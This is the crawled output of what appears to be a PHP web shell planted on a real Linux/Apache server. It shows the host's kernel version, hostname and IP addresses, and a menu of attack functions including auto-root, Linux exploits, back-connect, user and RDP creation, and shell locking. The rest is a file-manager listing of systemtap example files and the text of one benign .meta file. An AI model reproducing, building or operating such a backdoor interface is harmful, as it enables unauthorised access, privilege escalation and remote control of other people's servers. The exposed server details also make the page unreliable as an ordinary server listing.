Linux server2.hpierson.com 3.10.0-1160.105.1.el7.x86_64 #1 SMP Thu Dec 7 15:39:45 UTC 2023 x86_64
Apache
: 162.0.216.123 | : 216.73.216.152
28 Domain
?7.4.33
yvffpqmy
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
systemtap /
examples /
apps /
[ HOME SHELL ]
Name
Size
Permission
Action
gmalloc_watch.meta
513
B
-rw-r--r--
gmalloc_watch.stp
261
B
-rwxr-xr-x
hello.php
21
B
-rw-r--r--
libguestfs_log.meta
652
B
-rw-r--r--
libguestfs_log.stp
449
B
-rwxr-xr-x
php-trace.meta
360
B
-rw-r--r--
php-trace.stp
2.54
KB
-rwxr-xr-x
stap_time.meta
1.01
KB
-rw-r--r--
stap_time.stp
1.66
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : gmalloc_watch.meta
title: Tracing glib2 memory allocations name: gmalloc_watch.stp keywords: trace author: Colin Walters status: experimental exit: user-controlled requires: glib2-devel output: trace description: The gmalloc_watch.stp script from Colin Walters' blog (https://blog.verbum.org/2011/03/19/analyzing-memory-use-with-systemtap/) traces the allocation of glib2 memory using the markers in glib2. test_support: stap -l 'glib.mem_alloc' test_check: stap -p4 gmalloc_watch.stp test_installcheck: stap gmalloc_watch.stp -T 1
Close